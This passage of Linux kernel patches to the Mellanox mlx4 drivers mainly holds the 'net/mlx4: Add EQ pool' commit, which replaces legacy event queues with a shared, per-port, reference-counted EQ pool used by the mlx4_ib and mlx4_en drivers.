mlx4_QP_FLOW_STEERING_ATTACH_wrapper(struct mlx4_dev *dev, int slave, rule_header = (struct _rule_hw *)(ctrl + 1); header_id = map_hw_to_sw_id(be16_to_cpu(rule_header->id)); + if (header_id == MLX4_NET_TRANS_RULE_ID_ETH) + handle_eth_header_mcast_prio(ctrl, rule_header); + + if (slave == dev->caps.function) + goto execute; + switch (header_id) { case MLX4_NET_TRANS_RULE_ID_ETH: if (validate_eth_header_mac(slave, rule_header, rlist)) { @@ -4151,6 +4173,7 @@ int mlx4_QP_FLOW_STEERING_ATTACH_wrapper(struct mlx4_dev *dev, int slave, goto err_put; } +execute: err = mlx4_cmd_imm(dev, inbox->dma, &vhcr->out_param, vhcr->in_modifier, 0, MLX4_QP_FLOW_STEERING_ATTACH, MLX4_CMD_TIME_CLASS_A, From c66fa19c405a36673d4aab13658c8246413d5c0f Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:16 +0300 Subject: [PATCH 512/872] net/mlx4: Add EQ pool Previously, mlx4_en allocated EQs and used them exclusively. This affected RoCE performance, as applications which are events sensitive were limited to use only the legacy EQs. Change that by introducing an EQ pool. This pool is managed by mlx4_core. EQs are assigned to ports (when there are limited number of EQs, multiple ports could be assigned to the same EQs). An exception to this rule is the ASYNC EQ which handles various events. Legacy EQs are completely removed as all EQs could be shared. When a consumer (mlx4_ib/mlx4_en) requests an EQ, it asks for EQ serving on a specific port. The core driver calculates which EQ should be assigned to that request. Because IRQs are shared between IB and Ethernet modules, their names only include the PCI device BDF address. Signed-off-by: Matan Barak Signed-off-by: Ido Shamay Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx4/main.c | 71 ++-- drivers/infiniband/hw/mlx4/mlx4_ib.h | 1 - drivers/net/ethernet/mellanox/mlx4/cq.c | 10 +- drivers/net/ethernet/mellanox/mlx4/en_cq.c | 48 ++- .../net/ethernet/mellanox/mlx4/en_netdev.c | 7 +- drivers/net/ethernet/mellanox/mlx4/en_rx.c | 13 +- drivers/net/ethernet/mellanox/mlx4/eq.c | 353 +++++++++++------- drivers/net/ethernet/mellanox/mlx4/main.c | 74 +++- drivers/net/ethernet/mellanox/mlx4/mlx4.h | 11 +- drivers/net/ethernet/mellanox/mlx4/mlx4_en.h | 2 +- include/linux/mlx4/device.h | 11 +- 11 files changed, 342 insertions(+), 259 deletions(-) diff --git a/drivers/infiniband/hw/mlx4/main.c b/drivers/infiniband/hw/mlx4/main.c index 8c96c71e7bab..024b0f745035 100644 --- a/drivers/infiniband/hw/mlx4/main.c +++ b/drivers/infiniband/hw/mlx4/main.c @@ -2041,77 +2041,52 @@ static void init_pkeys(struct mlx4_ib_dev *ibdev) static void mlx4_ib_alloc_eqs(struct mlx4_dev *dev, struct mlx4_ib_dev *ibdev) { - char name[80]; - int eq_per_port = 0; - int added_eqs = 0; - int total_eqs = 0; - int i, j, eq; - - /* Legacy mode or comp_pool is not large enough */ - if (dev->caps.comp_pool == 0 || - dev->caps.num_ports > dev->caps.comp_pool) - return; - - eq_per_port = dev->caps.comp_pool / dev->caps.num_ports; - - /* Init eq table */ - added_eqs = 0; - mlx4_foreach_port(i, dev, MLX4_PORT_TYPE_IB) - added_eqs += eq_per_port; - - total_eqs = dev->caps.num_comp_vectors + added_eqs; + int i, j, eq = 0, total_eqs = 0; - ibdev->eq_table = kzalloc(total_eqs * sizeof(int), GFP_KERNEL); + ibdev->eq_table = kcalloc(dev->caps.num_comp_vectors, + sizeof(ibdev->eq_table[0]), GFP_KERNEL); if (!ibdev->eq_table) return; - ibdev->eq_added = added_eqs; - - eq = 0; - mlx4_foreach_port(i, dev, MLX4_PORT_TYPE_IB) { - for (j = 0; j < eq_per_port; j++) { - snprintf(name, sizeof(name), "mlx4-ib-%d-%d@%s", - i, j, dev->persist->pdev->bus->name); - /* Set IRQ for specific name (per ring) */ - if (mlx4_assign_eq(dev, name, NULL, - &ibdev->eq_table[eq])) { - /* Use legacy (same as mlx4_en driver) */ - pr_warn("Can't allocate EQ %d; reverting to legacy\n", eq); - ibdev->eq_table[eq] = - (eq % dev->caps.num_comp_vectors); - } - eq++; + for (i = 1; i <= dev->caps.num_ports; i++) { + for (j = 0; j < mlx4_get_eqs_per_port(dev, i); + j++, total_eqs++) { + if (i > 1 && mlx4_is_eq_shared(dev, total_eqs)) + continue; + ibdev->eq_table[eq] = total_eqs; + if (!mlx4_assign_eq(dev, i, + &ibdev->eq_table[eq])) + eq++; + else + ibdev->eq_table[eq] = -1; } } - /* Fill the reset of the vector with legacy EQ */ - for (i = 0, eq = added_eqs; i < dev->caps.num_comp_vectors; i++) - ibdev->eq_table[eq++] = i; + for (i = eq; i < dev->caps.num_comp_vectors; + ibdev->eq_table[i++] = -1) + ; /* Advertise the new number of EQs to clients */ - ibdev->ib_dev.num_comp_vectors = total_eqs; + ibdev->ib_dev.num_comp_vectors = eq; } static void mlx4_ib_free_eqs(struct mlx4_dev *dev, struct mlx4_ib_dev *ibdev) { int i; + int total_eqs = ibdev->ib_dev.num_comp_vectors; - /* no additional eqs were added */ + /* no eqs were allocated */ if (!ibdev->eq_table) return; /* Reset the advertised EQ number */ - ibdev->ib_dev.num_comp_vectors = dev->caps.num_comp_vectors; + ibdev->ib_dev.num_comp_vectors = 0; - /* Free only the added eqs */ - for (i = 0; i < ibdev->eq_added; i++) { - /* Don't free legacy eqs if used */ - if (ibdev->eq_table[i] <= dev->caps.num_comp_vectors) - continue; + for (i = 0; i < total_eqs; i++) mlx4_release_eq(dev, ibdev->eq_table[i]); - } kfree(ibdev->eq_table); + ibdev->eq_table = NULL; } static void *mlx4_ib_add(struct mlx4_dev *dev) diff --git a/drivers/infiniband/hw/mlx4/mlx4_ib.h b/drivers/infiniband/hw/mlx4/mlx4_ib.h index fce3934372a1..ef80e6c99a68 100644 --- a/drivers/infiniband/hw/mlx4/mlx4_ib.h +++ b/drivers/infiniband/hw/mlx4/mlx4_ib.h @@ -523,7 +523,6 @@ struct mlx4_ib_dev { struct mlx4_ib_iboe iboe; int counters[MLX4_MAX_PORTS]; int *eq_table; - int eq_added; struct kobject *iov_parent; struct kobject *ports_parent; struct kobject *dev_ports_parent[MLX4_MFUNC_MAX]; diff --git a/drivers/net/ethernet/mellanox/mlx4/cq.c b/drivers/net/ethernet/mellanox/mlx4/cq.c index e71f31387ac6..7431cd4d7390 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/cq.c @@ -292,7 +292,7 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, u64 mtt_addr; int err; - if (vector > dev->caps.num_comp_vectors + dev->caps.comp_pool) + if (vector >= dev->caps.num_comp_vectors) return -EINVAL; cq->vector = vector; @@ -319,7 +319,7 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, cq_context->flags |= cpu_to_be32(1 << 19); cq_context->logsize_usrpage = cpu_to_be32((ilog2(nent) << 24) | uar->index); - cq_context->comp_eqn = priv->eq_table.eq[vector].eqn; + cq_context->comp_eqn = priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].eqn; cq_context->log_page_size = mtt->page_shift - MLX4_ICM_PAGE_SHIFT; mtt_addr = mlx4_mtt_addr(dev, mtt); @@ -339,11 +339,11 @@ int mlx4_cq_alloc(struct mlx4_dev *dev, int nent, init_completion(&cq->free); cq->comp = mlx4_add_cq_to_tasklet; cq->tasklet_ctx.priv = - &priv->eq_table.eq[cq->vector].tasklet_ctx; + &priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].tasklet_ctx; INIT_LIST_HEAD(&cq->tasklet_ctx.list); - cq->irq = priv->eq_table.eq[cq->vector].irq; + cq->irq = priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(vector)].irq; return 0; err_radix: @@ -368,7 +368,7 @@ void mlx4_cq_free(struct mlx4_dev *dev, struct mlx4_cq *cq) if (err) mlx4_warn(dev, "HW2SW_CQ failed (%d) for CQN %06x\n", err, cq->cqn); - synchronize_irq(priv->eq_table.eq[cq->vector].irq); + synchronize_irq(priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq); spin_lock_irq(&cq_table->lock); radix_tree_delete(&cq_table->tree, cq->cqn); diff --git a/drivers/net/ethernet/mellanox/mlx4/en_cq.c b/drivers/net/ethernet/mellanox/mlx4/en_cq.c index 22da4d0d0f05..d71c567eb076 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_cq.c @@ -66,6 +66,7 @@ int mlx4_en_create_cq(struct mlx4_en_priv *priv, cq->ring = ring; cq->is_tx = mode; + cq->vector = mdev->dev->caps.num_comp_vectors; /* Allocate HW buffers on provided NUMA node. * dev->numa_node is used in mtt range allocation flow. @@ -101,12 +102,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, int err = 0; char name[25]; int timestamp_en = 0; - struct cpu_rmap *rmap = -#ifdef CONFIG_RFS_ACCEL - priv->dev->rx_cpu_rmap; -#else - NULL; -#endif + bool assigned_eq = false; cq->dev = mdev->pndev[priv->port]; cq->mcq.set_ci_db = cq->wqres.db.db; @@ -116,23 +112,19 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, memset(cq->buf, 0, cq->buf_size); if (cq->is_tx == RX) { - if (mdev->dev->caps.comp_pool) { - if (!cq->vector) { - sprintf(name, "%s-%d", priv->dev->name, - cq->ring); - /* Set IRQ for specific name (per ring) */ - if (mlx4_assign_eq(mdev->dev, name, rmap, - &cq->vector)) { - cq->vector = (cq->ring + 1 + priv->port) - % mdev->dev->caps.num_comp_vectors; - mlx4_warn(mdev, "Failed assigning an EQ to %s, falling back to legacy EQ's\n", - name); - } - + if (!mlx4_is_eq_vector_valid(mdev->dev, priv->port, + cq->vector)) { + cq->vector = cq_idx; + + err = mlx4_assign_eq(mdev->dev, priv->port, + &cq->vector); + if (err) { + mlx4_err(mdev, "Failed assigning an EQ to %s\n", + name); + goto free_eq; } - } else { - cq->vector = (cq->ring + 1 + priv->port) % - mdev->dev->caps.num_comp_vectors; + + assigned_eq = true; } cq->irq_desc = @@ -159,7 +151,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, &mdev->priv_uar, cq->wqres.db.dma, &cq->mcq, cq->vector, 0, timestamp_en); if (err) - return err; + goto free_eq; cq->mcq.comp = cq->is_tx ? mlx4_en_tx_irq : mlx4_en_rx_irq; cq->mcq.event = mlx4_en_cq_event; @@ -182,6 +174,12 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, napi_enable(&cq->napi); return 0; + +free_eq: + if (assigned_eq) + mlx4_release_eq(mdev->dev, cq->vector); + cq->vector = mdev->dev->caps.num_comp_vectors; + return err; } void mlx4_en_destroy_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq **pcq) @@ -191,9 +189,9 @@ void mlx4_en_destroy_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq **pcq) mlx4_en_unmap_buffer(&cq->wqres.buf); mlx4_free_hwq_res(mdev->dev, &cq->wqres, cq->buf_size); - if (priv->mdev->dev->caps.comp_pool && cq->vector) { + if (mlx4_is_eq_vector_valid(mdev->dev, priv->port, cq->vector) && + cq->is_tx == RX) mlx4_release_eq(priv->mdev->dev, cq->vector); - } cq->vector = 0; cq->buf_size = 0; cq->buf = NULL; diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c index 32f5ec737472..455cecae5aa4 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c @@ -1958,7 +1958,6 @@ void mlx4_en_free_resources(struct mlx4_en_priv *priv) int i; #ifdef CONFIG_RFS_ACCEL - free_irq_cpu_rmap(priv->dev->rx_cpu_rmap); priv->dev->rx_cpu_rmap = NULL; #endif @@ -2016,11 +2015,7 @@ int mlx4_en_alloc_resources(struct mlx4_en_priv *priv) } #ifdef CONFIG_RFS_ACCEL - if (priv->mdev->dev->caps.comp_pool) { - priv->dev->rx_cpu_rmap = alloc_irq_cpu_rmap(priv->mdev->dev->caps.comp_pool); - if (!priv->dev->rx_cpu_rmap) - goto err; - } + priv->dev->rx_cpu_rmap = mlx4_get_cpu_rmap(priv->mdev->dev, priv->port); #endif return 0; diff --git a/drivers/net/ethernet/mellanox/mlx4/en_rx.c b/drivers/net/ethernet/mellanox/mlx4/en_rx.c index 2a77a6b19121..35f726c17e48 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_rx.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_rx.c @@ -337,15 +337,10 @@ void mlx4_en_set_num_rx_rings(struct mlx4_en_dev *mdev) struct mlx4_dev *dev = mdev->dev; mlx4_foreach_port(i, dev, MLX4_PORT_TYPE_ETH) { - if (!dev->caps.comp_pool) - num_of_eqs = max_t(int, MIN_RX_RINGS, - min_t(int, - dev->caps.num_comp_vectors, - DEF_RX_RINGS)); - else - num_of_eqs = min_t(int, MAX_MSIX_P_PORT, - dev->caps.comp_pool/ - dev->caps.num_ports) - 1; + num_of_eqs = max_t(int, MIN_RX_RINGS, + min_t(int, + mlx4_get_eqs_per_port(mdev->dev, i), + DEF_RX_RINGS)); num_rx_rings = mlx4_low_memory_profile() ? MIN_RX_RINGS : min_t(int, num_of_eqs, diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 80bcd648c5e0..2e6fc6a860a7 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -895,8 +895,8 @@ static int mlx4_num_eq_uar(struct mlx4_dev *dev) * we need to map, take the difference of highest index and * the lowest index we'll use and add 1. */ - return (dev->caps.num_comp_vectors + 1 + dev->caps.reserved_eqs + - dev->caps.comp_pool)/4 - dev->caps.reserved_eqs/4 + 1; + return (dev->caps.num_comp_vectors + 1 + dev->caps.reserved_eqs) / 4 - + dev->caps.reserved_eqs / 4 + 1; } static void __iomem *mlx4_get_eq_uar(struct mlx4_dev *dev, struct mlx4_eq *eq) @@ -1085,8 +1085,7 @@ static void mlx4_free_eq(struct mlx4_dev *dev, static void mlx4_free_irqs(struct mlx4_dev *dev) { struct mlx4_eq_table *eq_table = &mlx4_priv(dev)->eq_table; - struct mlx4_priv *priv = mlx4_priv(dev); - int i, vec; + int i; if (eq_table->have_irq) free_irq(dev->persist->pdev->irq, dev); @@ -1097,20 +1096,6 @@ static void mlx4_free_irqs(struct mlx4_dev *dev) eq_table->eq[i].have_irq = 0; } - for (i = 0; i < dev->caps.comp_pool; i++) { - /* - * Freeing the assigned irq's - * all bits should be 0, but we need to validate - */ - if (priv->msix_ctl.pool_bm & 1ULL << i) { - /* NO need protecting*/ - vec = dev->caps.num_comp_vectors + 1 + i; - free_irq(priv->eq_table.eq[vec].irq, - &priv->eq_table.eq[vec]); - } - } - - kfree(eq_table->irq_names); } @@ -1191,76 +1176,73 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) } priv->eq_table.irq_names = - kmalloc(MLX4_IRQNAME_SIZE * (dev->caps.num_comp_vectors + 1 + - dev->caps.comp_pool), + kmalloc(MLX4_IRQNAME_SIZE * (dev->caps.num_comp_vectors + 1), GFP_KERNEL); if (!priv->eq_table.irq_names) { err = -ENOMEM; - goto err_out_bitmap; + goto err_out_clr_int; } - for (i = 0; i < dev->caps.num_comp_vectors; ++i) { - err = mlx4_create_eq(dev, dev->caps.num_cqs - - dev->caps.reserved_cqs + - MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? i : 0, - &priv->eq_table.eq[i]); - if (err) { - --i; - goto err_out_unmap; - } - } - - err = mlx4_create_eq(dev, MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? dev->caps.num_comp_vectors : 0, - &priv->eq_table.eq[dev->caps.num_comp_vectors]); - if (err) - goto err_out_comp; - - /*if additional completion vectors poolsize is 0 this loop will not run*/ - for (i = dev->caps.num_comp_vectors + 1; - i < dev->caps.num_comp_vectors + dev->caps.comp_pool + 1; ++i) { + for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) { + if (i == MLX4_EQ_ASYNC) { + err = mlx4_create_eq(dev, + MLX4_NUM_ASYNC_EQE + MLX4_NUM_SPARE_EQE, + 0, &priv->eq_table.eq[MLX4_EQ_ASYNC]); + } else { +#ifdef CONFIG_RFS_ACCEL + struct mlx4_eq *eq = &priv->eq_table.eq[i]; + int port = find_first_bit(eq->actv_ports.ports, + dev->caps.num_ports) + 1; + + if (port <= dev->caps.num_ports) { + struct mlx4_port_info *info = + &mlx4_priv(dev)->port[port]; + + if (!info->rmap) { + info->rmap = alloc_irq_cpu_rmap( + mlx4_get_eqs_per_port(dev, port)); + if (!info->rmap) { + mlx4_warn(dev, "Failed to allocate cpu rmap\n"); + err = -ENOMEM; + goto err_out_unmap; + } + } - err = mlx4_create_eq(dev, dev->caps.num_cqs - - dev->caps.reserved_cqs + - MLX4_NUM_SPARE_EQE, - (dev->flags & MLX4_FLAG_MSI_X) ? i : 0, - &priv->eq_table.eq[i]); - if (err) { - --i; - goto err_out_unmap; + err = irq_cpu_rmap_add( + info->rmap, eq->irq); + if (err) + mlx4_warn(dev, "Failed adding irq rmap\n"); + } +#endif + err = mlx4_create_eq(dev, dev->caps.num_cqs - + dev->caps.reserved_cqs + + MLX4_NUM_SPARE_EQE, + (dev->flags & MLX4_FLAG_MSI_X) ? + i + 1 - !!(i > MLX4_EQ_ASYNC) : 0, + eq); } + if (err) + goto err_out_unmap; } - if (dev->flags & MLX4_FLAG_MSI_X) { const char *eq_name; - for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) { - if (i < dev->caps.num_comp_vectors) { - snprintf(priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, - "mlx4-comp-%d@pci:%s", i, - pci_name(dev->persist->pdev)); - } else { - snprintf(priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, - "mlx4-async@pci:%s", - pci_name(dev->persist->pdev)); - } + snprintf(priv->eq_table.irq_names + + MLX4_EQ_ASYNC * MLX4_IRQNAME_SIZE, + MLX4_IRQNAME_SIZE, + "mlx4-async@pci:%s", + pci_name(dev->persist->pdev)); + eq_name = priv->eq_table.irq_names + + MLX4_EQ_ASYNC * MLX4_IRQNAME_SIZE; - eq_name = priv->eq_table.irq_names + - i * MLX4_IRQNAME_SIZE; - err = request_irq(priv->eq_table.eq[i].irq, - mlx4_msi_x_interrupt, 0, eq_name, - priv->eq_table.eq + i); - if (err) - goto err_out_async; + err = request_irq(priv->eq_table.eq[MLX4_EQ_ASYNC].irq, + mlx4_msi_x_interrupt, 0, eq_name, + priv->eq_table.eq + MLX4_EQ_ASYNC); + if (err) + goto err_out_unmap; - priv->eq_table.eq[i].have_irq = 1; - } + priv->eq_table.eq[MLX4_EQ_ASYNC].have_irq = 1; } else { snprintf(priv->eq_table.irq_names, MLX4_IRQNAME_SIZE, @@ -1269,36 +1251,38 @@ int mlx4_init_eq_table(struct mlx4_dev *dev) err = request_irq(dev->persist->pdev->irq, mlx4_interrupt, IRQF_SHARED, priv->eq_table.irq_names, dev); if (err) - goto err_out_async; + goto err_out_unmap; priv->eq_table.have_irq = 1; } err = mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 0, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); if (err) mlx4_warn(dev, "MAP_EQ for async EQ %d failed (%d)\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn, err); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn, err); - for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) - eq_set_ci(&priv->eq_table.eq[i], 1); + /* arm ASYNC eq */ + eq_set_ci(&priv->eq_table.eq[MLX4_EQ_ASYNC], 1); return 0; -err_out_async: - mlx4_free_eq(dev, &priv->eq_table.eq[dev->caps.num_comp_vectors]); - -err_out_comp: - i = dev->caps.num_comp_vectors - 1; - err_out_unmap: - while (i >= 0) { - mlx4_free_eq(dev, &priv->eq_table.eq[i]); - --i; + while (i >= 0) + mlx4_free_eq(dev, &priv->eq_table.eq[i--]); +#ifdef CONFIG_RFS_ACCEL + for (i = 1; i <= dev->caps.num_ports; i++) { + if (mlx4_priv(dev)->port[i].rmap) { + free_irq_cpu_rmap(mlx4_priv(dev)->port[i].rmap); + mlx4_priv(dev)->port[i].rmap = NULL; + } } +#endif + mlx4_free_irqs(dev); + +err_out_clr_int: if (!mlx4_is_slave(dev)) mlx4_unmap_clr_int(dev); - mlx4_free_irqs(dev); err_out_bitmap: mlx4_unmap_uar(dev); @@ -1316,11 +1300,19 @@ void mlx4_cleanup_eq_table(struct mlx4_dev *dev) int i; mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 1, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); +#ifdef CONFIG_RFS_ACCEL + for (i = 1; i <= dev->caps.num_ports; i++) { + if (mlx4_priv(dev)->port[i].rmap) { + free_irq_cpu_rmap(mlx4_priv(dev)->port[i].rmap); + mlx4_priv(dev)->port[i].rmap = NULL; + } + } +#endif mlx4_free_irqs(dev); - for (i = 0; i < dev->caps.num_comp_vectors + dev->caps.comp_pool + 1; ++i) + for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) mlx4_free_eq(dev, &priv->eq_table.eq[i]); if (!mlx4_is_slave(dev)) @@ -1371,87 +1363,166 @@ int mlx4_test_interrupts(struct mlx4_dev *dev) /* Return to default */ mlx4_MAP_EQ(dev, get_async_ev_mask(dev), 0, - priv->eq_table.eq[dev->caps.num_comp_vectors].eqn); + priv->eq_table.eq[MLX4_EQ_ASYNC].eqn); return err; } EXPORT_SYMBOL(mlx4_test_interrupts); -int mlx4_assign_eq(struct mlx4_dev *dev, char *name, struct cpu_rmap *rmap, - int *vector) +bool mlx4_is_eq_vector_valid(struct mlx4_dev *dev, u8 port, int vector) { + struct mlx4_priv *priv = mlx4_priv(dev); + vector = MLX4_CQ_TO_EQ_VECTOR(vector); + if (vector < 0 || (vector >= dev->caps.num_comp_vectors + 1) || + (vector == MLX4_EQ_ASYNC)) + return false; + + return test_bit(port - 1, priv->eq_table.eq[vector].actv_ports.ports); +} +EXPORT_SYMBOL(mlx4_is_eq_vector_valid); + +u32 mlx4_get_eqs_per_port(struct mlx4_dev *dev, u8 port) +{ + struct mlx4_priv *priv = mlx4_priv(dev); + unsigned int i; + unsigned int sum = 0; + + for (i = 0; i < dev->caps.num_comp_vectors + 1; i++) + sum += !!test_bit(port - 1, + priv->eq_table.eq[i].actv_ports.ports); + + return sum; +} +EXPORT_SYMBOL(mlx4_get_eqs_per_port); + +int mlx4_is_eq_shared(struct mlx4_dev *dev, int vector) +{ + struct mlx4_priv *priv = mlx4_priv(dev); + + vector = MLX4_CQ_TO_EQ_VECTOR(vector); + if (vector <= 0 || (vector >= dev->caps.num_comp_vectors + 1)) + return -EINVAL; + + return !!(bitmap_weight(priv->eq_table.eq[vector].actv_ports.ports, + dev->caps.num_ports) > 1); +} +EXPORT_SYMBOL(mlx4_is_eq_shared); + +struct cpu_rmap *mlx4_get_cpu_rmap(struct mlx4_dev *dev, int port) +{ + return mlx4_priv(dev)->port[port].rmap; +} +EXPORT_SYMBOL(mlx4_get_cpu_rmap); + +int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector) +{ struct mlx4_priv *priv = mlx4_priv(dev); - int vec = 0, err = 0, i; + int err = 0, i = 0; + u32 min_ref_count_val = (u32)-1; + int requested_vector = MLX4_CQ_TO_EQ_VECTOR(*vector); + int *prequested_vector = NULL; + mutex_lock(&priv->msix_ctl.pool_lock); - for (i = 0; !vec && i < dev->caps.comp_pool; i++) { - if (~priv->msix_ctl.pool_bm & 1ULL << i) { - priv->msix_ctl.pool_bm |= 1ULL << i; - vec = dev->caps.num_comp_vectors + 1 + i; - snprintf(priv->eq_table.irq_names + - vec * MLX4_IRQNAME_SIZE, - MLX4_IRQNAME_SIZE, "%s", name); -#ifdef CONFIG_RFS_ACCEL - if (rmap) { - err = irq_cpu_rmap_add(rmap, - priv->eq_table.eq[vec].irq); - if (err) - mlx4_warn(dev, "Failed adding irq rmap\n"); + if (requested_vector < (dev->caps.num_comp_vectors + 1) && + (requested_vector >= 0) && + (requested_vector != MLX4_EQ_ASYNC)) { + if (test_bit(port - 1, + priv->eq_table.eq[requested_vector].actv_ports.ports)) { + prequested_vector = &requested_vector; + } else { + struct mlx4_eq *eq; + + for (i = 1; i < port; + requested_vector += mlx4_get_eqs_per_port(dev, i++)) + ; + + eq = &priv->eq_table.eq[requested_vector]; + if (requested_vector < dev->caps.num_comp_vectors + 1 && + test_bit(port - 1, eq->actv_ports.ports)) { + prequested_vector = &requested_vector; } -#endif - err = request_irq(priv->eq_table.eq[vec].irq, - mlx4_msi_x_interrupt, 0, - &priv->eq_table.irq_names[vec<<5], - priv->eq_table.eq + vec); - if (err) { - /*zero out bit by fliping it*/ - priv->msix_ctl.pool_bm ^= 1 << i; - vec = 0; - continue; - /*we dont want to break here*/ + } + } + + if (!prequested_vector) { + requested_vector = -1; + for (i = 0; min_ref_count_val && i < dev->caps.num_comp_vectors + 1; + i++) { + struct mlx4_eq *eq = &priv->eq_table.eq[i]; + + if (min_ref_count_val > eq->ref_count && + test_bit(port - 1, eq->actv_ports.ports)) { + min_ref_count_val = eq->ref_count; + requested_vector = i; } + } - eq_set_ci(&priv->eq_table.eq[vec], 1); + if (requested_vector < 0) { + err = -ENOSPC; + goto err_unlock; } + + prequested_vector = &requested_vector; } + + if (!test_bit(*prequested_vector, priv->msix_ctl.pool_bm) && + dev->flags & MLX4_FLAG_MSI_X) { + set_bit(*prequested_vector, priv->msix_ctl.pool_bm); + snprintf(priv->eq_table.irq_names + + *prequested_vector * MLX4_IRQNAME_SIZE, + MLX4_IRQNAME_SIZE, "mlx4-%d@%s", + *prequested_vector, dev_name(&dev->persist->pdev->dev)); + + err = request_irq(priv->eq_table.eq[*prequested_vector].irq, + mlx4_msi_x_interrupt, 0, + &priv->eq_table.irq_names[*prequested_vector << 5], + priv->eq_table.eq + *prequested_vector); + + if (err) { + clear_bit(*prequested_vector, priv->msix_ctl.pool_bm); + *prequested_vector = -1; + } else { + eq_set_ci(&priv->eq_table.eq[*prequested_vector], 1); + priv->eq_table.eq[*prequested_vector].have_irq = 1; + } + } + + if (!err && *prequested_vector >= 0) + priv->eq_table.eq[*prequested_vector].ref_count++; + +err_unlock: mutex_unlock(&priv->msix_ctl.pool_lock); - if (vec) { - *vector = vec; - } else { + if (!err && *prequested_vector >= 0) + *vector = MLX4_EQ_TO_CQ_VECTOR(*prequested_vector); + else *vector = 0; - err = (i == dev->caps.comp_pool) ? -ENOSPC : err; - } + return err; } EXPORT_SYMBOL(mlx4_assign_eq); -int mlx4_eq_get_irq(struct mlx4_dev *dev, int vec) +int mlx4_eq_get_irq(struct mlx4_dev *dev, int cq_vec) { struct mlx4_priv *priv = mlx4_priv(dev); - return priv->eq_table.eq[vec].irq; + return priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq_vec)].irq; } EXPORT_SYMBOL(mlx4_eq_get_irq); void mlx4_release_eq(struct mlx4_dev *dev, int vec) { struct mlx4_priv *priv = mlx4_priv(dev); - /*bm index*/ - int i = vec - dev->caps.num_comp_vectors - 1; - - if (likely(i >= 0)) { - /*sanity check , making sure were not trying to free irq's - Belonging to a legacy EQ*/ - mutex_lock(&priv->msix_ctl.pool_lock); - if (priv->msix_ctl.pool_bm & 1ULL << i) { - free_irq(priv->eq_table.eq[vec].irq, - &priv->eq_table.eq[vec]); - priv->msix_ctl.pool_bm &= ~(1ULL << i); - } - mutex_unlock(&priv->msix_ctl.pool_lock); - } + int eq_vec = MLX4_CQ_TO_EQ_VECTOR(vec); + + mutex_lock(&priv->msix_ctl.pool_lock); + priv->eq_table.eq[eq_vec].ref_count--; + /* once we allocated EQ, we don't release it because it might be binded + * to cpu_rmap. + */ + mutex_unlock(&priv->msix_ctl.pool_lock); } EXPORT_SYMBOL(mlx4_release_eq); diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 70d33f6e2a41..3ec5113c5a33 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2364,11 +2364,11 @@ static int mlx4_setup_hca(struct mlx4_dev *dev) if (err) { if (dev->flags & MLX4_FLAG_MSI_X) { mlx4_warn(dev, "NOP command failed to generate MSI-X interrupt IRQ %d)\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].irq); + priv->eq_table.eq[MLX4_EQ_ASYNC].irq); mlx4_warn(dev, "Trying again without MSI-X\n"); } else { mlx4_err(dev, "NOP command failed to generate interrupt (IRQ %d), aborting\n", - priv->eq_table.eq[dev->caps.num_comp_vectors].irq); + priv->eq_table.eq[MLX4_EQ_ASYNC].irq); mlx4_err(dev, "BIOS or ACPI interrupt routing problem?\n"); } @@ -2486,9 +2486,10 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) struct mlx4_priv *priv = mlx4_priv(dev); struct msix_entry *entries; int i; + int port = 0; 